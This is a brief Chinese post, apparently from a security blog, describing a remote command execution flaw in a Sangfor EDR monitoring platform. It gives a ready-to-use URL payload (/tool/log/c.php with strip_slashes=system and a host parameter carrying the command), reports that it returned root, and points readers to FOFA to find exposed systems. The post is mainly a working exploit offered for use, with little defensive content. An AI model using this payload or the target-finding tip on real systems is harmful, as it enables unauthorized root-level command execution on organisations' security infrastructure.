EDR红队0day复现

在深x信x服的监测平台存在0day,RCE命令执行 我们直接修改host的值,就能命令执行,我们输入whoami 发现弹回了root, 【怀疑可能是某个大佬留的后门】 payload:/tool/log/c.php?strip_slashes=system&host=whoami 可以在fofa搜索相关的页面
相关文章
相关标签/搜索